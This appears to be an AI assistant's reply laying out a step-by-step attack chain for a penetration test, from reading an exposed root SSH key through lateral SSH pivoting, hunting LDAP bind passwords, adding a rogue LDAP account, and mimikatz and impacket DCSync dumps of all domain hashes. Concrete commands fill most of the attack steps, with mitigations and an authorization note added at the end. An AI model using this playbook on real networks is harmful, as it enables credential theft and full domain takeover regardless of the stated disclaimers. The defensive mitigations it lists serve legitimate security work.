**High-level summary**Stepwise chain: discover & exfiltrate world-readable root SSH key → use key to pivot to admin host(s) → locate LDAP/AD bind credentials or secrets → escalate to account with LDAP/AD modify rights (or extract krb/NTLM creds) → perform LDAP write or DCSync → obtain domain-level access. Below I show actionable steps, assumptions, and mitigations.Assumptions- You have an authorized test engagement and permission for this activity.- The environment uses SSH between hosts and stores a usable private key at /root/.ssh (no passphrase or passphrase can be cracked).- LDAP = OpenLDAP or Active Directory (AD) accessed from Linux/Windows hosts; some hosts reachable via the SSH key.- Containers share host FS or have /root accessible (misconfigured), and network ACLs allow internal access.Step-by-step exploitation (high level + concrete commands)1) Recon from your low-priv shell- Confirm key presence and read it:bash
ls -la /root/.ssh
cat /root/.ssh/id_rsa > /tmp/id_rsa
chmod 600 /tmp/id_rsa
2) Test SSH pivot- Try SSH to likely admin/jump hosts (scan internal subnet from container/host).bash
ssh -i /tmp/id_rsa admin@10.0.1.5
- Use ssh-agent forwarding if necessary:bash
eval $(ssh-agent -s)
ssh-add /tmp/id_rsa
ssh -A admin@10.0.1.5
3) Post-exploit on admin host — search for LDAP/AD secrets- On a Linux admin host, search for config files, scripts, password stores, or Ansible/vault files: - /etc/ldap.conf, /etc/sssd, /etc/krb5.conf, /opt/*, /home/admin/.ssh, /home/admin/.aws- Example: dump a config with bind creds:bash
grep -R "bindpw\|bind_dn\|password" /etc /home 2>/dev/null
- If AD, check for Kerberos tickets:4a) If you find LDAP bind credentials with write privileges- Use ldapmodify or ldapadd to create a new administrative user or add your account to an admin group (for OpenLDAP):bash
ldapadd -x -D "cn=admin,dc=example,dc=com" -w 'found_password' -H ldap://ldap.internal <<EOF
dn: cn=ptest,ou=users,dc=example,dc=com
objectClass: inetOrgPerson
cn: ptest
sn: tester
userPassword: P@ssw0rd123
EOF
- For AD, use tools like ldapmodify or PowerShell Remoting after gaining RDP/WinRM from a Windows host.4b) If you can access a Windows admin workstation- Extract credentials/tickets with mimikatz or secretsdump (requires appropriate Windows access): - Use mimikatz to dump LSA secrets or cached credentials, then perform DCSync if you get a domain credential with replication rights.- Use impacket-secretsdump.py or Invoke-Mimikatz to harvest NTLM hashes and test pass-the-hash or kerberoast.5) Achieve domain-level privileges- If you obtain a user with replication rights or domain admin, perform DCSync to pull krbtgt and all hashes:bash
impacket-secretsdump -just-dc -outputfile dump domain/replicator:password@dc.domain.local
- If LDAP/AD write was possible, create a privileged account/service and use it to authenticate across domain services.Post-exploitation: persistence and cleanup- Create limited, well-named accounts or scheduled tasks; collect audit evidence for reporting; do not destroy critical services. Document exact access and artifacts.Key reasoning behind steps- World-readable root keys are high-value credentials that can pivot laterally; locating configuration files and secrets on admin hosts is high-yield because many services still embed credentials.- Two main paths: (A) obtain LDAP/AD bind with modify privileges (direct LDAP write), or (B) pivot to Windows, extract domain creds, and use AD tools (DCSync, Kerberoast).- Using existing SSH keys avoids noisy exploits and leverages trust relationships.Mitigations (defensive recommendations)- Strict file permissions: /root/.ssh/* must be 600 and owned by root; enforce filesystem permissions via baseline scans.- Prevent key reuse: Use short-lived keys, hardware-backed keys, and unique keys per host.- Restrict SSH trust: Use bastion/jump hosts, restrict admin key usage with from=, command= options in authorized_keys and network ACLs.- Secrets management: Remove hardcoded bind passwords; use vaults (HashiCorp Vault, Azure Key Vault) and avoid storing creds in configs or Ansible inventories.- Monitor and detection: EDR/IDS for unusual SSH connections, access to LDAP changes, creation of new users, Kerberos anomalies (kerberos pre-auth failures, unusual TGT requests), and monitor read of /root/.ssh.- Principle of least privilege: Limit which accounts can modify LDAP/AD; restrict replication rights; rotate service account credentials and enforce MFA for administrative access.Ethical note- Only perform these steps under explicit authorization, with scope defined in a penetration test engagement. Capture and report all artifacts and remediation steps.